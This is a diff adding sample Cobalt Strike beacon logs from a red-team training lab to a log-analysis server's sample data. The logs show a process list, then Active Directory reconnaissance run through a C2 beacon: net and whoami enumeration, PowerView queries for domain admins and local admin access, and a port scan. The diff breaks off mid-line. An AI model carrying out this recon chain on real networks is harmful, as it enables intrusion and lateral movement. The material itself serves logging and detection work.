+svchost.exe 688 1140 +svchost.exe 688 1148 +svchost.exe 688 1156 +svchost.exe 688 1264 +svchost.exe 688 1304 +svchost.exe 688 1332 +svchost.exe 688 1368 +svchost.exe 688 1424 +svchost.exe 688 1464 +svchost.exe 688 1484 +svchost.exe 688 1620 +svchost.exe 688 1628 +svchost.exe 688 1732 +svchost.exe 688 1756 +svchost.exe 688 1772 +svchost.exe 688 1832 +taskhostw.exe 1132 1848 +svchost.exe 688 1872 +svchost.exe 688 1904 +svchost.exe 688 1924 +svchost.exe 688 2012 +svchost.exe 688 1528 +svchost.exe 688 1568 +svchost.exe 688 2052 +svchost.exe 688 2112 +svchost.exe 688 2240 +Memory Compression 4 2248 +svchost.exe 688 2284 +VSSVC.exe 688 2320 +svchost.exe 688 2384 +svchost.exe 688 2428 +svchost.exe 688 2448 +svchost.exe 688 2568 +svchost.exe 688 2656 +svchost.exe 688 2664 +svchost.exe 688 2672 +svchost.exe 688 2788 +svchost.exe 688 2796 +svchost.exe 688 2804 +svchost.exe 688 2920 +svchost.exe 688 2928 +spoolsv.exe 688 2512 +OfficeClickToRun.exe 688 3320 +sysmon64.exe 688 3328 +WaAppAgent.exe 688 3336 +WindowsAzureTelemetryService.exe 688 3344 +WindowsAzureGuestAgent.exe 688 3352 +WindowsAzureNetAgent.exe 688 3360 +svchost.exe 688 3368 +svchost.exe 688 3376 +svchost.exe 688 3384 +svchost.exe 688 3392 +svchost.exe 688 3400 +svchost.exe 688 3408 +svchost.exe 688 3416 +MsMpEng.exe 688 3424 +svchost.exe 688 3432 +svchost.exe 688 3796 +VFPlugin.exe 3360 3896 +conhost.exe 3896 3960 +unsecapp.exe 920 3236 +WmiPrvSE.exe 920 4104 +svchost.exe 688 4424 +WmiPrvSE.exe 920 4712 +svchost.exe 688 4924 +svchost.exe 688 4960 +csrss.exe 5148 5156 +winlogon.exe 5148 5200 +fontdrvhost.exe 5200 5364 +dwm.exe 5200 5436 +svchost.exe 688 5628 +rdpclip.exe 1040 5988 x64 STROOP\w.tax 2 +sihost.exe 1484 6036 x64 STROOP\w.tax 2 +svchost.exe 688 6056 x64 STROOP\w.tax 2 +svchost.exe 688 6116 x64 STROOP\w.tax 2 +taskhostw.exe 1132 5312 x64 STROOP\w.tax 2 +svchost.exe 688 5592 +svchost.exe 688 4792 +ctfmon.exe 4792 5016 x64 STROOP\w.tax 2 +explorer.exe 6212 6236 x64 STROOP\w.tax 2 +svchost.exe 688 6252 +svchost.exe 688 6424 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2 +svchost.exe 688 6784 +SearchUI.exe 920 6832 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2 +SearchIndexer.exe 688 6708 +svchost.exe 688 7208 +svchost.exe 688 7244 +svchost.exe 688 7316 +smartscreen.exe 920 7428 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2 +SecurityHealthService.exe 688 7512 +svchost.exe 688 7780 +WaSecAgentProv.exe 3336 5764 +conhost.exe 5764 6940 +SgrmBroker.exe 688 5720 +svchost.exe 688 1720 +svchost.exe 688 1992 +svchost.exe 688 2104 x64 STROOP\w.tax 2 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2 +dllhost.exe 920 3028 x64 STROOP\w.tax 2 +chrome.exe 6236 4396 x64 STROOP\w.tax 2 +svchost.exe 688 4752 +chrome.exe 4396 6272 x64 STROOP\w.tax 2 +chrome.exe 4396 5484 x64 STROOP\w.tax 2 +chrome.exe 4396 7688 x64 STROOP\w.tax 2 +chrome.exe 4396 7728 x64 STROOP\w.tax 2 +chrome.exe 4396 5080 x64 STROOP\w.tax 2 +POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2 +chrome.exe 4396 800 x64 STROOP\w.tax 2 +chrome.exe 4396 152 x64 STROOP\w.tax 2 +WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2 +rundll32.exe 2212 7872 x86 STROOP\w.tax 2 +MSOSYNC.EXE 6440 1644 x86 STROOP\w.tax 2 +svchost.exe 688 3724 +svchost.exe 688 3728 +SystemSettings.exe 920 7268 x64 STROOP\w.tax 2 +ApplicationFrameHost.exe 920 6520 x64 STROOP\w.tax 2 +svchost.exe 688 7640 +svchost.exe 688 4988 +svchost.exe 688 6636 +audiodg.exe 2568 4636 x64 0 +Taskmgr.exe 6236 8172 x64 STROOP\w.tax 2 +mousedrivercontrol.exe 7872 4208 x64 STROOP\w.tax 2 + + +03/30 08:16:47 UTC [input] net +03/30 08:16:47 UTC [error] net error: not enough arguments +03/30 08:17:06 UTC [input] net domain +03/30 08:17:06 UTC [task] <> Tasked beacon to run net domain +03/30 08:17:09 UTC [checkin] host called home, sent: 26700 bytes +03/30 08:17:09 UTC [output] +received output: +stroop.local + +03/30 08:17:17 UTC [input] net dclist +03/30 08:17:17 UTC [task] Tasked beacon to run net dclist +03/30 08:17:18 UTC [checkin] host called home, sent: 104506 bytes +03/30 08:17:20 UTC [output] +received output: +DCs: + + + +03/30 08:17:35 UTC [output] +received output: + Server Name IP Address Platform Version Type Comment + ----------- ---------- -------- ------- ---- ------- +[-] Error: 6118 + + +03/30 08:17:43 UTC [input] net dclist stroop.local +03/30 08:17:43 UTC [task] Tasked beacon to run net dclist on stroop.local +03/30 08:17:44 UTC [checkin] host called home, sent: 104506 bytes +03/30 08:17:45 UTC [output] +received output: +DCs in domain 'stroop.local': + + + +03/30 08:18:14 UTC [output] +received output: + Server Name IP Address Platform Version Type Comment + ----------- ---------- -------- ------- ---- ------- +[-] Error: 6118 + + +03/30 08:18:18 UTC [input] net domain_controllers stroop.local +03/30 08:18:18 UTC [task] Tasked beacon to run net domain_controllers on stroop.local +03/30 08:18:18 UTC [checkin] host called home, sent: 104518 bytes +03/30 08:18:20 UTC [output] +received output: +Domain Controllers in domain 'stroop.local': + + Server Name IP Address + ----------- ---------- + S-WIN22 10.2.1.10 + S-WIN21 10.1.2.10 + + +03/30 08:18:33 UTC [input] net logons +03/30 08:18:33 UTC [task] Tasked beacon to run net logons on localhost +03/30 08:18:34 UTC [checkin] host called home, sent: 104506 bytes +03/30 08:18:36 UTC [output] +received output: +Logged on users at \\localhost: + +STROOP\W.Tax +STROOP\W.Tax +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ +STROOP\L-WIN223$ + + +03/30 08:18:48 UTC [input] net logons \\s-win21 +03/30 08:18:48 UTC [task] Tasked beacon to run net logons on s-win21 +03/30 08:18:51 UTC [checkin] host called home, sent: 104506 bytes +03/30 08:18:53 UTC [output] +received output: +Logged on users at \\s-win21: + +[-] Error: 5 + + +03/30 08:19:16 UTC [input] shell net user +03/30 08:19:16 UTC [task] Tasked beacon to run: net user +03/30 08:19:16 UTC [checkin] host called home, sent: 39 bytes +03/30 08:19:17 UTC [output] +received output: + +User accounts for \\L-WIN223 + +------------------------------------------------------------------------------- +bofh DefaultAccount Guest +WDAGUtilityAccount +The command completed successfully. + + + +03/30 08:19:27 UTC [input] shell net whoami +03/30 08:19:27 UTC [task] Tasked beacon to run: net whoami +03/30 08:19:31 UTC [checkin] host called home, sent: 41 bytes +03/30 08:19:31 UTC [output] +received output: +The syntax of this command is: + +NET + [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | + HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START | + STATISTICS | STOP | TIME | USE | USER | VIEW ] + + +03/30 08:19:59 UTC [input] shell net whoami /all +03/30 08:19:59 UTC [task] Tasked beacon to run: net whoami /all +03/30 08:20:00 UTC [checkin] host called home, sent: 46 bytes +03/30 08:20:00 UTC [output] +received output: +The syntax of this command is: + +NET + [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | + HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START | + STATISTICS | STOP | TIME | USE | USER | VIEW ] + + +03/30 08:20:04 UTC [input] shell whoami /all +03/30 08:20:04 UTC [task] Tasked beacon to run: whoami /all +03/30 08:20:05 UTC [checkin] host called home, sent: 42 bytes +03/30 08:20:05 UTC [output] +received output: + +USER INFORMATION +---------------- + +User Name SID +============ ============================================== +stroop\w.tax S-1-5-21-2163199188-2306780613-1636707950-4076 + + +GROUP INFORMATION +----------------- + +Group Name Type SID Attributes +========================================== ================ ============================================== ================================================== +Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group +BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only +BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group +BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group +NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group +NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group +NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group +NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group +LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group +STROOP\IT-webmail Group S-1-5-21-2163199188-2306780613-1636707950-2716 Mandatory group, Enabled by default, Enabled group +STROOP\SalesMarketingExt Group S-1-5-21-2163199188-2306780613-1636707950-2709 Mandatory group, Enabled by default, Enabled group +STROOP\IT-ProxyAll Group S-1-5-21-2163199188-2306780613-1636707950-2714 Mandatory group, Enabled by default, Enabled group +STROOP\All-RUS Group S-1-5-21-2163199188-2306780613-1636707950-2732 Mandatory group, Enabled by default, Enabled group +STROOP\SalesRUS Group S-1-5-21-2163199188-2306780613-1636707950-2705 Mandatory group, Enabled by default, Enabled group +STROOP\IT-MobileUsers Group S-1-5-21-2163199188-2306780613-1636707950-2715 Mandatory group, Enabled by default, Enabled group +Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 + + +PRIVILEGES INFORMATION +---------------------- + +Privilege Name Description State +============================= ==================================== ======== +SeShutdownPrivilege Shut down the system Disabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeUndockPrivilege Remove computer from docking station Disabled +SeIncreaseWorkingSetPrivilege Increase a process working set Disabled +SeTimeZonePrivilege Change the time zone Disabled + + +USER CLAIMS INFORMATION +----------------------- + +User claims unknown. + +Kerberos support for Dynamic Access Control on this device has been disabled. + + +03/30 08:20:39 UTC [input] net sessions +03/30 08:20:39 UTC [task] Tasked beacon to run net sessions on localhost +03/30 08:20:43 UTC [checkin] host called home, sent: 104508 bytes +03/30 08:20:46 UTC [output] +received output: +Sessions for \\localhost: + + Computer User name Active (s) Idle (s) + -------- --------- ---------- -------- + \\[::1] W.Tax 0 0 + + +03/30 08:20:52 UTC [input] net share +03/30 08:20:52 UTC [task] Tasked beacon to run net share on localhost +03/30 08:20:56 UTC [checkin] host called home, sent: 104505 bytes +03/30 08:20:58 UTC [output] +received output: +Shares at \\localhost: + + Share name Comment + ---------- ------- + ADMIN$ Remote Admin + C$ Default share + D$ Default share + IPC$ Remote IPC + + +03/30 08:21:03 UTC [input] net user +03/30 08:21:03 UTC [task] Tasked beacon to run net user on localhost +03/30 08:21:07 UTC [checkin] host called home, sent: 104504 bytes +03/30 08:21:09 UTC [output] +received output: +Users for \\localhost: + +bofh (admin) +DefaultAccount +Guest +WDAGUtilityAccount + + +03/30 08:21:27 UTC [input] net user \\s-win21 stroop\w.tax +03/30 08:21:27 UTC [task] Tasked beacon to run net user stroop\w.tax on s-win21 +03/30 08:21:28 UTC [checkin] host called home, sent: 104504 bytes +03/30 08:21:30 UTC [output] +received output: +Account information for stroop\w.tax on \\s-win21: + +[-] Error: 2221 + + +03/30 08:21:33 UTC [input] net user \\s-win21 w.tax +03/30 08:21:33 UTC [task] Tasked beacon to run net user w.tax on s-win21 +03/30 08:21:35 UTC [checkin] host called home, sent: 104504 bytes +03/30 08:21:37 UTC [output] +received output: +Account information for w.tax on \\s-win21: + +User name W.Tax +Full Name +Comment +User's Comment +Country code 0 +Account active Yes +Account expires Never +Account type User + +Password last set 22 hours ago +Password expires Yes +Password changeable Yes +Password required Yes +User may change password Yes + +Workstations allowed +Logon script +User profile +Home directory \\S-win43\UserHome$\W.Tax +Last logon 03/29/2020 11:49:35 + + +03/30 08:22:18 UTC [input] net group \\s-win21 'domain users' +03/30 08:22:18 UTC [task] Tasked beacon to run net group 'domain users' on s-win21 +03/30 08:22:20 UTC [checkin] host called home, sent: 104505 bytes +03/30 08:22:22 UTC [output] +received output: +Members of 'domain users' on \\s-win21: + + + +03/30 08:22:36 UTC [input] net group \\s-win21 'domain admins' +03/30 08:22:37 UTC [task] Tasked beacon to run net group 'domain admins' on s-win21 +03/30 08:22:41 UTC [checkin] host called home, sent: 104505 bytes +03/30 08:22:43 UTC [output] +received output: +Members of 'domain admins' on \\s-win21: + + + +03/30 08:22:52 UTC [input] net view +03/30 08:22:52 UTC [task] Tasked beacon to run net view +03/30 08:22:53 UTC [checkin] host called home, sent: 104504 bytes +03/30 08:22:55 UTC [output] +received output: +List of hosts: + + + +03/30 08:23:08 UTC [input] net view stroop.local +03/30 08:23:08 UTC [task] Tasked beacon to run net view on stroop.local +03/30 08:23:09 UTC [checkin] host called home, sent: 104504 bytes +03/30 08:23:11 UTC [output] +received output: + Server Name IP Address Platform Version Type Comment + ----------- ---------- -------- ------- ---- ------- +[-] Error: 6118 + + +03/30 08:23:11 UTC [output] +received output: +List of hosts for domain 'stroop.local': + + + +03/30 08:23:22 UTC [input] powershell-import +03/30 08:23:39 UTC [task] Tasked beacon to import: C:\Users\outflank\Desktop\Training\Lab7 - internal recon\PowerView.ps1 +03/30 08:23:39 UTC [checkin] host called home, sent: 101224 bytes +03/30 08:23:40 UTC [output] +received output: + Server Name IP Address Platform Version Type Comment + ----------- ---------- -------- ------- ---- ------- +[-] Error: 6118 + + +03/30 08:23:50 UTC [input] powershell get-netuser w.tax +03/30 08:23:50 UTC [task] Tasked beacon to run: get-netuser w.tax +03/30 08:23:54 UTC [checkin] host called home, sent: 313 bytes +03/30 08:23:56 UTC [output] +received output: +#< CLIXML + + +logoncount : 4 +distinguishedname : CN=W.Tax,OU=User,OU=Accounts,DC=stroop,DC=local +objectclass : {top, person, organizationalPerson, user} +lastlogontimestamp : 3/29/2020 11:36:13 AM +name : W.Tax +objectsid : S-1-5-21-2163199188-2306780613-1636707950-4076 +samaccountname : W.Tax +codepage : 0 +homedirectory : \\S-win43\UserHome$\W.Tax +samaccounttype : 805306368 +countrycode : 0 +cn : W.Tax +accountexpires : 9223372036854775807 +whenchanged : 3/29/2020 11:45:05 AM +instancetype : 4 +usncreated : 14979 +objectguid : 6694a63e-28cd-425c-afb4-9b218ec8d013 +objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=stroop,DC=local +dscorepropagationdata : 1/1/1601 12:00:00 AM +memberof : {CN=SalesRUS,OU=Sales,OU=Groups,DC=stroop,DC=local, + CN=SalesMarketingExt,OU=Sales,OU=Groups,DC=stroop,DC=local, + CN=All-RUS,OU=Users,OU=Groups,DC=stroop,DC=local, + CN=IT-MobileUsers,OU=IT,OU=Corp,OU=Groups,DC=stroop,DC=local...} +lastlogon : 3/30/2020 7:45:36 AM +adspath : LDAP://CN=W.Tax,OU=User,OU=Accounts,DC=stroop,DC=local +homedrive : H: +useraccountcontrol : 512 +whencreated : 3/29/2020 10:04:19 AM +primarygroupid : 513 +pwdlastset : 3/29/2020 10:04:19 AM +usnchanged : 31037 + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:24:22 UTC [input] powershell get-netlocalgroup -computername l-win223 +03/30 08:24:22 UTC [task] Tasked beacon to run: get-netlocalgroup -computername l-win223 +03/30 08:24:25 UTC [checkin] host called home, sent: 377 bytes +03/30 08:24:29 UTC [output] +received output: +#< CLIXML + + +ComputerName : l-win223 +AccountName : STROOP/l-win223/bofh +IsDomain : False +IsGroup : False +SID : S-1-5-21-3005677839-2763426082-3693314417-500 +Description : Built-in account for administering the computer/domain +PwdLastSet : 3/29/2020 2:17:30 AM +PwdExpired : False +UserFlags : 66049 +Disabled : False +LastLogin : 3/30/2020 8:20:09 AM + +ComputerName : l-win223 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win223 +AccountName : stroop.local/svc-bsservice +IsDomain : True +IsGroup : False +SID : S-1-5-21-2163199188-2306780613-1636707950-4820 +Description : +Disabled : +LastLogin : 3/29/2020 3:35:29 PM +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win223 +AccountName : stroop.local/W.Tax +IsDomain : True +IsGroup : False +SID : S-1-5-21-2163199188-2306780613-1636707950-4076 +Description : +Disabled : +LastLogin : 3/30/2020 7:45:36 AM +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:24:59 UTC [input] powershell get-netgroup -username w.tax +03/30 08:24:59 UTC [task] Tasked beacon to run: get-netgroup -username w.tax +03/30 08:25:02 UTC [checkin] host called home, sent: 345 bytes +03/30 08:25:04 UTC [output] +received output: +#< CLIXML +STROOP\IT-MobileUsers +STROOP\SalesRUS +STROOP\All-RUS +STROOP\IT-ProxyAll +STROOP\SalesMarketingExt +STROOP\Domain Users +STROOP\IT-webmail +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:25:23 UTC [input] poweshell get-netgroupmember -groupanem "domain admins +03/30 08:25:24 UTC [error] Unknown command: poweshell get-netgroupmember -groupanem "domain admins +03/30 08:25:31 UTC [input] poweshell get-netgroupmember -groupname "domain admins +03/30 08:25:31 UTC [error] Unknown command: poweshell get-netgroupmember -groupname "domain admins +03/30 08:25:35 UTC [input] powershell get-netgroupmember -groupname "domain admins +03/30 08:25:35 UTC [task] Tasked beacon to run: get-netgroupmember -groupname "domain admins +03/30 08:25:36 UTC [checkin] host called home, sent: 389 bytes +03/30 08:25:37 UTC [output] +received output: +#< CLIXML +The string is missing the terminator: "._x000D__x000A_ + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException_x000D__x000A_ + FullyQualifiedErrorId : TerminatorExpectedAtEndOfString_x000D__x000A_ _x000D__x000A_ + +03/30 08:25:42 UTC [input] powershell get-netgroupmember -groupname "domain admins" +03/30 08:25:42 UTC [task] Tasked beacon to run: get-netgroupmember -groupname "domain admins" +03/30 08:25:47 UTC [checkin] host called home, sent: 393 bytes +03/30 08:25:49 UTC [output] +received output: +#< CLIXML + + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-linuxldap +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4819 +IsGroup : False +MemberDN : CN=svc-linuxldap,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-test +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4818 +IsGroup : False +MemberDN : CN=svc-test,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-proxy +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4816 +IsGroup : False +MemberDN : CN=svc-proxy,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-backupserver +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4814 +IsGroup : False +MemberDN : CN=svc-backupserver,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : svc-av-control +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4812 +IsGroup : False +MemberDN : CN=svc-av-control,OU=IT,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-M.vanBers +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4745 +IsGroup : False +MemberDN : CN=ADMIN-M.vanBers,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-M.vanLonden +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4744 +IsGroup : False +MemberDN : CN=ADMIN-M.vanLonden,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-Y.Koelen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4743 +IsGroup : False +MemberDN : CN=ADMIN-Y.Koelen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Jansen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4742 +IsGroup : False +MemberDN : CN=ADMIN-A.Jansen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-C.Noteboom +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4741 +IsGroup : False +MemberDN : CN=ADMIN-C.Noteboom,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.Schippers +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4740 +IsGroup : False +MemberDN : CN=ADMIN-J.Schippers,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-W.Hovens +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4739 +IsGroup : False +MemberDN : CN=ADMIN-W.Hovens,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Henneman +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4738 +IsGroup : False +MemberDN : CN=ADMIN-A.Henneman,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-R.Nijenhuis +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4737 +IsGroup : False +MemberDN : CN=ADMIN-R.Nijenhuis,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.deBeurs +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4736 +IsGroup : False +MemberDN : CN=ADMIN-J.deBeurs,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-L.vanDinther +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4735 +IsGroup : False +MemberDN : CN=ADMIN-L.vanDinther,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-T.Verkroost +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4734 +IsGroup : False +MemberDN : CN=ADMIN-T.Verkroost,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-K.Pleiter +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4733 +IsGroup : False +MemberDN : CN=ADMIN-K.Pleiter,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-L.Okhuijsen +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4732 +IsGroup : False +MemberDN : CN=ADMIN-L.Okhuijsen,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-W.Trommel +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4731 +IsGroup : False +MemberDN : CN=ADMIN-W.Trommel,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-U.Kerver +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4730 +IsGroup : False +MemberDN : CN=ADMIN-U.Kerver,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-A.Kool +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4729 +IsGroup : False +MemberDN : CN=ADMIN-A.Kool,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-Z.Verheij +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4728 +IsGroup : False +MemberDN : CN=ADMIN-Z.Verheij,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-S.Verbaas +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4727 +IsGroup : False +MemberDN : CN=ADMIN-S.Verbaas,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-J.Mathot +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4726 +IsGroup : False +MemberDN : CN=ADMIN-J.Mathot,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : ADMIN-R.Domburg +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-4725 +IsGroup : False +MemberDN : CN=ADMIN-R.Domburg,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : bofh +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-500 +IsGroup : False +MemberDN : CN=bofh,CN=Users,DC=stroop,DC=local + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:26:21 UTC [input] powershell find-localadminaccess -noping +03/30 08:26:21 UTC [task] Tasked beacon to run: find-localadminaccess -noping +03/30 08:26:22 UTC [checkin] host called home, sent: 349 bytes +03/30 08:26:25 UTC [output] +received output: +#< CLIXML +L-WIN224.stroop.local +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:26:49 UTC [input] powershell Get-NetLocalGroup -computername l-win224 +03/30 08:26:49 UTC [task] Tasked beacon to run: Get-NetLocalGroup -computername l-win224 +03/30 08:26:49 UTC [checkin] host called home, sent: 377 bytes +03/30 08:26:53 UTC [output] +received output: +#< CLIXML + + +ComputerName : l-win224 +AccountName : STROOP/l-win224/bofh +IsDomain : False +IsGroup : False +SID : S-1-5-21-1770739200-3703860189-1291868052-500 +Description : Built-in account for administering the computer/domain +PwdLastSet : 3/29/2020 2:17:31 AM +PwdExpired : False +UserFlags : 66049 +Disabled : False +LastLogin : 3/30/2020 8:25:09 AM + +ComputerName : l-win224 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win224 +AccountName : stroop.local/Domain Users +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-513 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:27:33 UTC [input] portscan l-win224.stroop.local 135,445,3389 none +03/30 08:27:33 UTC [task] Tasked beacon to scan ports 135,445,3389 on l-win224.stroop.local +03/30 08:27:36 UTC [checkin] host called home, sent: 93245 bytes +03/30 08:27:42 UTC [output] +received output: +l-win224.stroop.local:3389 +l-win224.stroop.local:135 +l-win224.stroop.local:445 (platform: 500 version: 10.0 name: L-WIN224 domain: STROOP) +Scanner module is complete + + +03/30 08:41:44 UTC [input] note beacon was cutoff diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log new file mode 100644 index 00000000..ec0d6665 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log @@ -0,0 +1,531 @@ +03/30 07:55:47 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: rundll32.exe; pid: 7872; os: Windows; version: 10.0; beacon arch: x86 (x64) +03/30 07:56:16 UTC [input] ps +03/30 07:56:16 UTC [task] Tasked beacon to list processes +03/30 07:56:18 